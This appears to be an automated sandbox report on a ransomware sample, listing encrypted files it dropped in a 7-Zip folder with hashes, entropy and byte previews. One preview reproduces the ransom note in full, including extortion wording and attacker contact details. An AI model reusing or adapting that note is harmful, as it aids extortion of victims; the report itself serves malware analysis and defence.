                                SHA-256:BE5416C96E13EB90CCC4AB2337991D8E2D8CB362691FA28E9C45CB32698AE45C
                                SHA-512:CAF2FB8AD25957C62249A4F5821FFE2F4DB7C115CC7E2C444B4BE513193FA7B310018CC3B4B5DD75C1DFBF1A25EA22C18E623871BDC2FE206E91D7BD920D6D1B
                                Malicious:false
                                Preview:.*@.....cm.vDt.E..~..~h$......\q.#..?.S3..S(..?.bZ5F..j.H..:....Q..z...`s"S........Do..&..a.+.`..m..%.<.HM..K...6....E.;..T2...."..P...`.u.y.].Z.<_..Wle.8.y.8.7.I..R{E...?..'[!u.!Ui..S.Wz,^.)..@n....y.OQ..q....b.4YdR.]..hi.0W.G.@..E0.B..<......9......P....$...6..p}P/D.v'C.C&i.......B.+...l{.S"'...A.....l..".. s..\...>..q..!...p.'.b..1..L..,.L..&..\.<)r.#..Fi,\........E..e..>.d.H...p......ma<.mJ../n....;...$..'.....s...&.....xo ..:.pO.......R.X.!....HL..R....s...y..FfV...Y.Et...w%e..Y...[.W. ._OG......w[..&.:"0_.oX.|.....R..W....8..X.....B.R.9.o.....u./..=..../.d..8...c.....$|.e..h!....?4.r..,...Bb....:.L..R:.+ .M......jo{T...=`...`A..7K7`.../...B....6....M.FS......K.U...{..L.Lq%y.d..uK.."..I.K.d~...2}.l.`lg..R..3.].[.J..6.9L/.$G..DmH.....u.@.F..R.b.rw...%.".(.;.y.cR.Z.BI.M....G.]`..A.....~?M...!.6!-B.....~....Ig..U.....:.a......oy....@.rheP..co...4..Sz.....o.$7.. ....Ay..}.....c.^'8...i.sL.r.j.c..m"...=..E...:a..\+.G.K......k....M.u"....

                                C:\Program Files\7-Zip\7zG.exe

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:OpenPGP Public Key
                                Category:dropped
                                Size (bytes):701024
                                Entropy (8bit):7.300693280007674
                                Encrypted:false
                                SSDEEP:12288:HW0pFmql9C80qN+8rKhUdTC/wE1ZDRrH1hDMYOObBn:LFTl9P2owwYOOb9
                                MD5:0B90D1BC58FDA7B314E21DA3FB95AA38
                                SHA1:ED0BD1279468CB8A9F7C0F4028344B53C5B71214
                                SHA-256:ECF0AD2033387D91EB12965DAAEF79506D35742D81DC04535F2F89FF99C2819A
                                SHA-512:9A75187984C76AD1E47DCFB1FC88C365C9237CCDF9564F9A9427AF42DC1B77B374069D1B56045628AA36E16F58024DFF69505E129165D5DC59C2E2AA6CF182DB
                                Malicious:true
                                Preview:. q.....+.....1..35..b.uf,.....z....<..7..~............Y.a..M.(...._.E..c.2d....vf4cy......P).%...z.....v..k..JC.W..`g.E.5!..$!.+&...A".-..y.....`Fw...^6..^.#-z.~.hk.....+/$...U...3L?...J(.Qka...?.Zx.V{.>...X....K...}..../......ue~....f.P().......h...eT.I......&..4#......H#(.+......dR...3H._...$MFJ"..-.]..a.}.z.7i....l).5..?.&L..0dI...........tX....V>'.d.D...u..4......4|....r...).....(.M.......E.Eq^..m0.B..Y+.&...$*;I..1#..kY..V...0.T...^.g+h>....T..ss..H.1..t....8~..d;....t.$...E....)<~..\g..'.S.._.d@lOI...8D.'..v..`.{.T+...M.'.e....P.0n.s.).Yy.4.J.?.3..........pO....3.....5........./uA.9...-].H......7gD.{[yd.....^h]r.Er.c..........].f.. .2..C....._8..7.....3..3>%l..q.}o}.o....S...A...5>....-H.$.$V..]....Ux.u......j..-.'0...L..gQ.......<`.q...w...:.>...d.Y.&.......v.&....8.r.~...L].]pT.@{E..G8h..E.@.."..~....S(.=.....e..A.8..+..R^,...i'<i[`...lB."Q.-m...O`.@../.kP.)W.oe.j&._../..YI...WC.U...p...b.-...5..S.ml....4...5...0........W

                                C:\Program Files\7-Zip\7zG.exe.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:OpenPGP Public Key
                                Category:dropped
                                Size (bytes):701024
                                Entropy (8bit):7.300693280007674
                                Encrypted:false
                                SSDEEP:12288:HW0pFmql9C80qN+8rKhUdTC/wE1ZDRrH1hDMYOObBn:LFTl9P2owwYOOb9
                                MD5:0B90D1BC58FDA7B314E21DA3FB95AA38
                                SHA1:ED0BD1279468CB8A9F7C0F4028344B53C5B71214
                                SHA-256:ECF0AD2033387D91EB12965DAAEF79506D35742D81DC04535F2F89FF99C2819A
                                SHA-512:9A75187984C76AD1E47DCFB1FC88C365C9237CCDF9564F9A9427AF42DC1B77B374069D1B56045628AA36E16F58024DFF69505E129165D5DC59C2E2AA6CF182DB
                                Malicious:false
                                Preview:. q.....+.....1..35..b.uf,.....z....<..7..~............Y.a..M.(...._.E..c.2d....vf4cy......P).%...z.....v..k..JC.W..`g.E.5!..$!.+&...A".-..y.....`Fw...^6..^.#-z.~.hk.....+/$...U...3L?...J(.Qka...?.Zx.V{.>...X....K...}..../......ue~....f.P().......h...eT.I......&..4#......H#(.+......dR...3H._...$MFJ"..-.]..a.}.z.7i....l).5..?.&L..0dI...........tX....V>'.d.D...u..4......4|....r...).....(.M.......E.Eq^..m0.B..Y+.&...$*;I..1#..kY..V...0.T...^.g+h>....T..ss..H.1..t....8~..d;....t.$...E....)<~..\g..'.S.._.d@lOI...8D.'..v..`.{.T+...M.'.e....P.0n.s.).Yy.4.J.?.3..........pO....3.....5........./uA.9...-].H......7gD.{[yd.....^h]r.Er.c..........].f.. .2..C....._8..7.....3..3>%l..q.}o}.o....S...A...5>....-H.$.$V..]....Ux.u......j..-.'0...L..gQ.......<`.q...w...:.>...d.Y.&.......v.&....8.r.~...L].]pT.@{E..G8h..E.@.."..~....S(.=.....e..A.8..+..R^,...i'<i[`...lB."Q.-m...O`.@../.kP.)W.oe.j&._../..YI...WC.U...p...b.-...5..S.ml....4...5...0........W

                                C:\Program Files\7-Zip\History.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):58913
                                Entropy (8bit):7.996806507601204
                                Encrypted:true
                                SSDEEP:1536:zx0pfyVr3ztIVQ63w/ZZeQeNcyUQtL/m6IIV0a:+6FR+FKZZ2N5Ll6a
                                MD5:035B0022FB3F452B823519BFB1F3F64A
                                SHA1:F8D5F6C88EA7F2A1680B016FACEC2D0929C1185B
                                SHA-256:65CE658EB2665C153CBD68D935EE58867E43274ED8E6FCA9CD59F4D6673A8BD4
                                SHA-512:6456E69C2448FCD689641816F5200DE97E62D2777A26EA75DE7E54FEDC275791AE70D331386952CE4D30D21F0D55D4F282294EBAAC137306A1D9D0CCDEE3A179
                                Malicious:true
                                Preview:..h4...L.|........Q....}.5....$./r.(b.co..oN.D..#..j."`>.D.Ls.h#...V.O.F(8>....$a..F_r....[..5.$..Oc.W...."Md...9..D......L.X...5.WmT...1...@|f.S.z.....{.1....H`.Y.>g.W....9z....I...t.H..3.x<.u`.....-..I...y.@.....9J7.V.....Y...:..,GrF....z.j...3'.;wp.P..b.R5..Z7.m.i!D+z....l...(m..J.-R....>,EsR..'...K.8E. p.9.._z..?....@...A....H...9.}.[\..}.8.c.q......)q+rS=.-....==.q.ZJ.u..=/'.8..46r.&....ek...&"...Y\.]f..d..h...n)=Gi.xzL.!....j...OsR.........SS...U.KiE..3(jPU.........%4...tK..u..L...0....V.~4...u_"...-.@.k...7.".]s.0.6.y.b.9......j....S7.^.........AP,..;...P_.Q.....g...}?.y...hA.^.6........8..gq..Q.+...p...*.t....~}......d..;.H1s.[..^. /......+.X.64,.E...t.R4-8.[..j&......o@...u.B,#=.>R...*.u....^...?bq..!y.@.R_8 ./^.._z..EY.:....i.[......R.{.....s..+T.e...wmD..@...../.*.E...r....e2h....|...H.R..+....b..^......W.IH*p..$...\.V..../Uo.W...p..&..-......'.........Z.e..}..JW.b9'...9|M.....Q...p....r.D(.n=.."N.=..5...bc.......1.;q

                                C:\Program Files\7-Zip\History.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):58913
                                Entropy (8bit):7.996806507601204
                                Encrypted:true
                                SSDEEP:1536:zx0pfyVr3ztIVQ63w/ZZeQeNcyUQtL/m6IIV0a:+6FR+FKZZ2N5Ll6a
                                MD5:035B0022FB3F452B823519BFB1F3F64A
                                SHA1:F8D5F6C88EA7F2A1680B016FACEC2D0929C1185B
                                SHA-256:65CE658EB2665C153CBD68D935EE58867E43274ED8E6FCA9CD59F4D6673A8BD4
                                SHA-512:6456E69C2448FCD689641816F5200DE97E62D2777A26EA75DE7E54FEDC275791AE70D331386952CE4D30D21F0D55D4F282294EBAAC137306A1D9D0CCDEE3A179
                                Malicious:true
                                Preview:..h4...L.|........Q....}.5....$./r.(b.co..oN.D..#..j."`>.D.Ls.h#...V.O.F(8>....$a..F_r....[..5.$..Oc.W...."Md...9..D......L.X...5.WmT...1...@|f.S.z.....{.1....H`.Y.>g.W....9z....I...t.H..3.x<.u`.....-..I...y.@.....9J7.V.....Y...:..,GrF....z.j...3'.;wp.P..b.R5..Z7.m.i!D+z....l...(m..J.-R....>,EsR..'...K.8E. p.9.._z..?....@...A....H...9.}.[\..}.8.c.q......)q+rS=.-....==.q.ZJ.u..=/'.8..46r.&....ek...&"...Y\.]f..d..h...n)=Gi.xzL.!....j...OsR.........SS...U.KiE..3(jPU.........%4...tK..u..L...0....V.~4...u_"...-.@.k...7.".]s.0.6.y.b.9......j....S7.^.........AP,..;...P_.Q.....g...}?.y...hA.^.6........8..gq..Q.+...p...*.t....~}......d..;.H1s.[..^. /......+.X.64,.E...t.R4-8.[..j&......o@...u.B,#=.>R...*.u....^...?bq..!y.@.R_8 ./^.._z..EY.:....i.[......R.{.....s..+T.e...wmD..@...../.*.E...r....e2h....|...H.R..+....b..^......W.IH*p..$...\.V..../Uo.W...p..&..-......'.........Z.e..}..JW.b9'...9|M.....Q...p....r.D(.n=.."N.=..5...bc.......1.;q

                                C:\Program Files\7-Zip\Lang\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\7-Zip\Lang\af.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5633
                                Entropy (8bit):7.966065574648915
                                Encrypted:false
                                SSDEEP:96:WKlHmY02RY0ORo7jSm3z3UlFrMbXU0p56+5q3WiQWb2tauZo6wH28sgevuAVOD:WKlnY0Tb3glFwbXU0Td8hx68Z9Wu+VOD
                                MD5:FF03E05D98E5BB3005CB2E05E1125CFF
                                SHA1:FE8073CFF60B2D46C7EA351E11D7EED4F63BEA9F
                                SHA-256:A638AB51CCD36F76B699FEEE00F47260D990112080CA2E9C3B4255B4FF2910E1
                                SHA-512:FCD4ED8405EA8E963257AB661A22B501ABCDEAEF3A402D7F46C940A54833695859DF371F1B7C7E77BBA1988AF98375137B1255A05E5447C6B370948E5FE49EC7
                                Malicious:false
                                Preview:...(|.#t..pqk7...\.*..P...+.......b.s.x...)x:*...l....X6O1?.<Y.(.T4.r.../JU....g..@<......!.....v'...........&=?.A.o.F....1..TR._...:.h.....g..%.O.z;.G........._n/......v.=...?L....at.@6.=%.>...;.S...X5...f.m2.)G.#.!O...o%..7..;m. .a.v.U...X._<2...5.+p...6n.......s..r.\..5aQ..;.E4....v......~2.....tlAX;.:h.>.D..D..hU.....,...X%..tO.l>.oV.4<.,.vz...._...e...N.(.l.E.....N....[....... .....54?u.k.V$..P....iZr...K.....i....7|.D$`.Vt.uf.F....)sJ..W\.Y.F......i...........s.K..St...K.............o.\../...%..;.'0....\.......#....3w....\..D.~.?.`.sM.X.imd4=Y?*.........o.i.....l3p.......\..o...e(A..e....@.?5..o...^I,..k6...k&.8 .4.<...n.......\.Q]..o..o....'.....j....P..U.H.."...72..H.,......g.BB.u+..6,.?.c\..h..v.....P.Y...6......h ..9..8..Re..:..LZ.H...H.....q..Z".8..v.N&.....R0.I.......D...,0K"......1 8bu.Gi...d.~j...fD]...p.b.|..C..:>m.s...(...W[.#........m...@.U.....i$.}OCS.c....[0.U....f.4...)...M.....N.#...+^~0..^..d.......gM)....gC;

                                C:\Program Files\7-Zip\Lang\af.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5633
                                Entropy (8bit):7.966065574648915
                                Encrypted:false
                                SSDEEP:96:WKlHmY02RY0ORo7jSm3z3UlFrMbXU0p56+5q3WiQWb2tauZo6wH28sgevuAVOD:WKlnY0Tb3glFwbXU0Td8hx68Z9Wu+VOD
                                MD5:FF03E05D98E5BB3005CB2E05E1125CFF
                                SHA1:FE8073CFF60B2D46C7EA351E11D7EED4F63BEA9F
                                SHA-256:A638AB51CCD36F76B699FEEE00F47260D990112080CA2E9C3B4255B4FF2910E1
                                SHA-512:FCD4ED8405EA8E963257AB661A22B501ABCDEAEF3A402D7F46C940A54833695859DF371F1B7C7E77BBA1988AF98375137B1255A05E5447C6B370948E5FE49EC7
                                Malicious:false
                                Preview:...(|.#t..pqk7...\.*..P...+.......b.s.x...)x:*...l....X6O1?.<Y.(.T4.r.../JU....g..@<......!.....v'...........&=?.A.o.F....1..TR._...:.h.....g..%.O.z;.G........._n/......v.=...?L....at.@6.=%.>...;.S...X5...f.m2.)G.#.!O...o%..7..;m. .a.v.U...X._<2...5.+p...6n.......s..r.\..5aQ..;.E4....v......~2.....tlAX;.:h.>.D..D..hU.....,...X%..tO.l>.oV.4<.,.vz...._...e...N.(.l.E.....N....[....... .....54?u.k.V$..P....iZr...K.....i....7|.D$`.Vt.uf.F....)sJ..W\.Y.F......i...........s.K..St...K.............o.\../...%..;.'0....\.......#....3w....\..D.~.?.`.sM.X.imd4=Y?*.........o.i.....l3p.......\..o...e(A..e....@.?5..o...^I,..k6...k&.8 .4.<...n.......\.Q]..o..o....'.....j....P..U.H.."...72..H.,......g.BB.u+..6,.?.c\..h..v.....P.Y...6......h ..9..8..Re..:..LZ.H...H.....q..Z".8..v.N&.....R0.I.......D...,0K"......1 8bu.Gi...d.~j...fD]...p.b.|..C..:>m.s...(...W[.#........m...@.U.....i$.}OCS.c....[0.U....f.4...)...M.....N.#...+^~0..^..d.......gM)....gC;

                                C:\Program Files\7-Zip\Lang\an.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8384
                                Entropy (8bit):7.976165327536036
                                Encrypted:false
                                SSDEEP:192:B8ypkKiiusW5GfAWDBy6ABiu4DAXejAQrRD0ekN1v11+VOdo:BpSius3fATXBpejAQrRwe8xb+VOK
                                MD5:E2B31AD99DC24286C49D7C9CFBD6D249
                                SHA1:5FE73DB16D95E33949B1A193C49EEA264078C9B9
                                SHA-256:96D0638287AF3EA33CF1B5C51CC67B40BE2AB29650FFE1BD9801B408DFACB0AD
                                SHA-512:2F89905544EC75DBF192D5823B8E059FF882FF8088E273981A643B315BFE1D1A561F92BCDDDCB825AD30A2CD4ED20AC30724F178160D390F474CBA4F98D0EF58
                                Malicious:false
                                Preview:.<....K...}.Mf.f.vx.JjI........O.....4=.|.a........]...g-[./....%....x..u.#.,.}..P....;..]0..r#1m.e..txd.[j..|yq"..$...n..z_r.%L....Fo....<..SH.."0........u.1........+.}..._EF09F......g6.Y..w..*!F..5.......3.]5]...4.....l...,J..!..Xm|....4.Q.)-..yZ.L.fwV....3...4%}.).o#Rc.D...Eg._......ag.?|TO~.i..9.@.....gBF.Bs.2.......H.yn.[.t....c..z.LB.J....WzjX,*Ky.+.x......h..^...0u.^GS.:.3!.}......e.w..^.....R...:3....~.....9..........e.i5.r.u..hX.W).2.P^.M..!..A.mn...BR.P/.H."..4.<gb...S.f..0.w..2..D8.S...].a.......U.4..U.a....\.z.P]...N.v...v.....\{<u.....=L...n.9.I.........;8.J.~@p...................k.9.1. .|9y..l....I..h..l.C............o.a.Da../...........f...)...2.........ENYh..].j....'....P.6u..r..... .6..q.P:..}...>.<0j...e..|.-..+.VZ.~.q.w....L..5......1@.."B.........4S.....s._...?-.....\_X...$L....b+C....._..E.....P..W/. [B!......!.n=i-.....<o..=.x..... ... ]}.\..!.d..-r`-.=.o.3"be./.....q0+\6..2=.&IJ.x..>Xd.P...C.5G.b.b.8.=......)..#.Q@:

                                C:\Program Files\7-Zip\Lang\an.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8384
                                Entropy (8bit):7.976165327536036
                                Encrypted:false
                                SSDEEP:192:B8ypkKiiusW5GfAWDBy6ABiu4DAXejAQrRD0ekN1v11+VOdo:BpSius3fATXBpejAQrRwe8xb+VOK
                                MD5:E2B31AD99DC24286C49D7C9CFBD6D249
                                SHA1:5FE73DB16D95E33949B1A193C49EEA264078C9B9
                                SHA-256:96D0638287AF3EA33CF1B5C51CC67B40BE2AB29650FFE1BD9801B408DFACB0AD
                                SHA-512:2F89905544EC75DBF192D5823B8E059FF882FF8088E273981A643B315BFE1D1A561F92BCDDDCB825AD30A2CD4ED20AC30724F178160D390F474CBA4F98D0EF58
                                Malicious:false
                                Preview:.<....K...}.Mf.f.vx.JjI........O.....4=.|.a........]...g-[./....%....x..u.#.,.}..P....;..]0..r#1m.e..txd.[j..|yq"..$...n..z_r.%L....Fo....<..SH.."0........u.1........+.}..._EF09F......g6.Y..w..*!F..5.......3.]5]...4.....l...,J..!..Xm|....4.Q.)-..yZ.L.fwV....3...4%}.).o#Rc.D...Eg._......ag.?|TO~.i..9.@.....gBF.Bs.2.......H.yn.[.t....c..z.LB.J....WzjX,*Ky.+.x......h..^...0u.^GS.:.3!.}......e.w..^.....R...:3....~.....9..........e.i5.r.u..hX.W).2.P^.M..!..A.mn...BR.P/.H."..4.<gb...S.f..0.w..2..D8.S...].a.......U.4..U.a....\.z.P]...N.v...v.....\{<u.....=L...n.9.I.........;8.J.~@p...................k.9.1. .|9y..l....I..h..l.C............o.a.Da../...........f...)...2.........ENYh..].j....'....P.6u..r..... .6..q.P:..}...>.<0j...e..|.-..+.VZ.~.q.w....L..5......1@.."B.........4S.....s._...?-.....\_X...$L....b+C....._..E.....P..W/. [B!......!.n=i-.....<o..=.x..... ... ]}.\..!.d..-r`-.=.o.3"be./.....q0+\6..2=.&IJ.x..>Xd.P...C.5G.b.b.8.=......)..#.Q@:

                                C:\Program Files\7-Zip\Lang\ar.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:OpenPGP Public Key
                                Category:dropped
                                Size (bytes):13402
                                Entropy (8bit):7.983640080296722
                                Encrypted:false
                                SSDEEP:384:+mpv/GJ6M/D7VCnXSgU7OQcnf9OWy9+VOc:+K/GJ6M77VgUKB0jA
                                MD5:E791B474B6F93C9A5406DDAE97DC16EF
                                SHA1:7E16B6B66D8814491BBF3BCAA68F9823EE163C3B
                                SHA-256:102E86CDA6204DD97F7A424586A3FDAC24BD94CDBC558E1956B2B6DE69E71E44
                                SHA-512:36AAAD15E891365F21AA1460258AC99CD58F067CF66B6DAD41E050E59AB46A8F11299A2DA0CDB4236A9B56B7556989F597BD4EF2ECBBCBDD7E073E57ECAF98D9
                                Malicious:false
                                Preview:........\u...k.....H?dcbD.E.:}.~.......#h.w..^(..{<....8....9:0......X,w.q....C..`(..H.....p.8.C...^.8..`]P...{...?.A....l....O`....g......sN......mu!...2..ir.....D.M.y.ov.w4.P.s.f. ..."v{,N1U4.Tm....t*...G.-...ZpLII"\D.9+.0.e.|R.Z...........b...z..E..B....@$..'.l......MR._C.m........rE'..>.0.#r.F....8s.#.d...O._c..D.....A.4GF...9|DU..u...D..A..:.]...z..=..<....c!..Z...........\.P.V$...0:mX..4. ..9:......+S.X..j......`2.O.}.A..=....=.0O\iq..n...9.j......VI.h..R..Iv..\..<.a....k)...ll.W.4..x....0.w.?9..M....`j>.98#JLucm.n=F)kFt.:_.........<..f...wp...,.v.I5.3...>.nUx..mT*.2........t.....l.tf..../9&*.oZ...{......zZ.4.&V.....dJFk..j.>.%{...O.L$...A`./.....z..f..9.J...N"c8.gGK.A..6...^...O..($.vjg.@..B.i@....7=v.1.H.]..&L..xY.z~..Qz..]....a...n.cM..F-.X.=*...'/.9..;J...-....{..Ei-......mn.{..|q.x.$(R..[.Ke.3.Q.R....K.........~.[..gA.N....^...[.n....!.e..../....^..4.uv'.Y..".h.%.[..yT..W.. F...v..:(..:.@..,.i4. .v..../.X......>.xI`.[.....b.b....

                                C:\Program Files\7-Zip\Lang\ar.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:OpenPGP Public Key
                                Category:dropped
                                Size (bytes):13402
                                Entropy (8bit):7.983640080296722
                                Encrypted:false
                                SSDEEP:384:+mpv/GJ6M/D7VCnXSgU7OQcnf9OWy9+VOc:+K/GJ6M77VgUKB0jA
                                MD5:E791B474B6F93C9A5406DDAE97DC16EF
                                SHA1:7E16B6B66D8814491BBF3BCAA68F9823EE163C3B
                                SHA-256:102E86CDA6204DD97F7A424586A3FDAC24BD94CDBC558E1956B2B6DE69E71E44
                                SHA-512:36AAAD15E891365F21AA1460258AC99CD58F067CF66B6DAD41E050E59AB46A8F11299A2DA0CDB4236A9B56B7556989F597BD4EF2ECBBCBDD7E073E57ECAF98D9
                                Malicious:false
                                Preview:........\u...k.....H?dcbD.E.:}.~.......#h.w..^(..{<....8....9:0......X,w.q....C..`(..H.....p.8.C...^.8..`]P...{...?.A....l....O`....g......sN......mu!...2..ir.....D.M.y.ov.w4.P.s.f. ..."v{,N1U4.Tm....t*...G.-...ZpLII"\D.9+.0.e.|R.Z...........b...z..E..B....@$..'.l......MR._C.m........rE'..>.0.#r.F....8s.#.d...O._c..D.....A.4GF...9|DU..u...D..A..:.]...z..=..<....c!..Z...........\.P.V$...0:mX..4. ..9:......+S.X..j......`2.O.}.A..=....=.0O\iq..n...9.j......VI.h..R..Iv..\..<.a....k)...ll.W.4..x....0.w.?9..M....`j>.98#JLucm.n=F)kFt.:_.........<..f...wp...,.v.I5.3...>.nUx..mT*.2........t.....l.tf..../9&*.oZ...{......zZ.4.&V.....dJFk..j.>.%{...O.L$...A`./.....z..f..9.J...N"c8.gGK.A..6...^...O..($.vjg.@..B.i@....7=v.1.H.]..&L..xY.z~..Qz..]....a...n.cM..F-.X.=*...'/.9..;J...-....{..Ei-......mn.{..|q.x.$(R..[.Ke.3.Q.R....K.........~.[..gA.N....^...[.n....!.e..../....^..4.uv'.Y..".h.%.[..yT..W.. F...v..:(..:.@..,.i4. .v..../.X......>.xI`.[.....b.b....

                                C:\Program Files\7-Zip\Lang\ast.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5979
                                Entropy (8bit):7.9728873486257115
                                Encrypted:false
                                SSDEEP:96:5572G3V8P68a8mVUR8nECBAgxE2IhscGe2nBq2jN1E5WevuAVOu:z9aSpbUqEKAnHhscGe2nE2jLE5W+VOu
                                MD5:F0F4A6A4C43856EEDD5086B3B76FA106
                                SHA1:1EA8FC991F29F05B405021683FFBD69992D6E203
                                SHA-256:2D390477DBF94AAE2B0000D47B4A3AD5319CEDF48D21DE43875BF560B0D87DA3
                                SHA-512:ECFC0584EB595F81E8FA7177463B71C4DA02C586DC089432AF53BE7B7E4496E3D2CDB9FB5A5F96FD77897D80BF9D8508F379C579764ED03D8758B36FD851BB12
                                Malicious:false
                                Preview:!.Wp..w2s.:&.uG..,=...l...pj..N...N..}i...B..T.W)..Z....w.t.r..1.)...5.E..]..gq.h._..@.:)S...O....!.Y.,..7SXCC%.Drh.C0.!.>.....&.,.j-E1.....w.##.K%.j.`.e.L.......y....u.q....3...Y....K.P.....$x...=.....D.O.........T..X..F..1e.u..[..rI..z^d.l.....v.g..U..u....!..b..C.`.s.).//...BF..X.]zc..=r.......r......5.p.y.....??Y.c..&.D...#..0......[./.X.W_m...;.....|..c....&..x.\...c.8.H......o...@....kx%"5.d....'qg...oi....Z....z'z..z/.AFq.D.x..L....|fT7......>p......tL..B..,i.GC.mU..z..t...nr}x....1t.:....m..c.A...z.......,..E5.C....~h.^:<.wJ.|..A...J....f7.A...W..y.L5.y.v<..yQ..9..#..{.J\w.4....9YB...>.8){.[T.......L..3z..&,E......R'g."#...o.zM.!.a.;;..\:....,j.\.......""!;p....7jr|....X..}.3.G....2p.*d..ZCr....V...[#.....>_ %.M.....usS.....).../%..Q. O...N:.L..+/...6&..'F.x.Q.".F...#;'....N?.|.........a*.._....g!..^Y..S..PW7z..B..t.~.$..2.#.z..w.....lN...D....)..`I.&.)...OH.&.N........._..r..L...m..3...3=...x....E.A....*[..O....&.4...%se......$.%

                                C:\Program Files\7-Zip\Lang\ast.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5979
                                Entropy (8bit):7.9728873486257115
                                Encrypted:false
                                SSDEEP:96:5572G3V8P68a8mVUR8nECBAgxE2IhscGe2nBq2jN1E5WevuAVOu:z9aSpbUqEKAnHhscGe2nE2jLE5W+VOu
                                MD5:F0F4A6A4C43856EEDD5086B3B76FA106
                                SHA1:1EA8FC991F29F05B405021683FFBD69992D6E203
                                SHA-256:2D390477DBF94AAE2B0000D47B4A3AD5319CEDF48D21DE43875BF560B0D87DA3
                                SHA-512:ECFC0584EB595F81E8FA7177463B71C4DA02C586DC089432AF53BE7B7E4496E3D2CDB9FB5A5F96FD77897D80BF9D8508F379C579764ED03D8758B36FD851BB12
                                Malicious:false
                                Preview:!.Wp..w2s.:&.uG..,=...l...pj..N...N..}i...B..T.W)..Z....w.t.r..1.)...5.E..]..gq.h._..@.:)S...O....!.Y.,..7SXCC%.Drh.C0.!.>.....&.,.j-E1.....w.##.K%.j.`.e.L.......y....u.q....3...Y....K.P.....$x...=.....D.O.........T..X..F..1e.u..[..rI..z^d.l.....v.g..U..u....!..b..C.`.s.).//...BF..X.]zc..=r.......r......5.p.y.....??Y.c..&.D...#..0......[./.X.W_m...;.....|..c....&..x.\...c.8.H......o...@....kx%"5.d....'qg...oi....Z....z'z..z/.AFq.D.x..L....|fT7......>p......tL..B..,i.GC.mU..z..t...nr}x....1t.:....m..c.A...z.......,..E5.C....~h.^:<.wJ.|..A...J....f7.A...W..y.L5.y.v<..yQ..9..#..{.J\w.4....9YB...>.8){.[T.......L..3z..&,E......R'g."#...o.zM.!.a.;;..\:....,j.\.......""!;p....7jr|....X..}.3.G....2p.*d..ZCr....V...[#.....>_ %.M.....usS.....).../%..Q. O...N:.L..+/...6&..'F.x.Q.".F...#;'....N?.|.........a*.._....g!..^Y..S..PW7z..B..t.~.$..2.#.z..w.....lN...D....)..`I.&.)...OH.&.N........._..r..L...m..3...3=...x....E.A....*[..O....&.4...%se......$.%

                                C:\Program Files\7-Zip\Lang\az.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):10227
                                Entropy (8bit):7.982331981122129
                                Encrypted:false
                                SSDEEP:192:K1ul4OasLJSfjLQrkxB/aV2kn3L/KIIH7kWOGWIAa+yGwaUv+VOM:KQ4O1AIIbY22SAWOGb+yGov+VOM
                                MD5:63ED1D2EF8657E967CD5C711F1DDB816
                                SHA1:EB1B1784A58724E4D31B4899ED7ACF35EFE404C7
                                SHA-256:D951C7497BA7236C0F7843EF213072B818FC4F08528E1075CA8F358F0C3FAD7F
                                SHA-512:4E78FB6851B17AF78FAF7FB5F0262BD716AA7FD5564350F33A24CBD7F0B95FE01400ED8C11E1F221B322438832072B815C773DC4330DEA7CAE1005182C701D60
                                Malicious:false
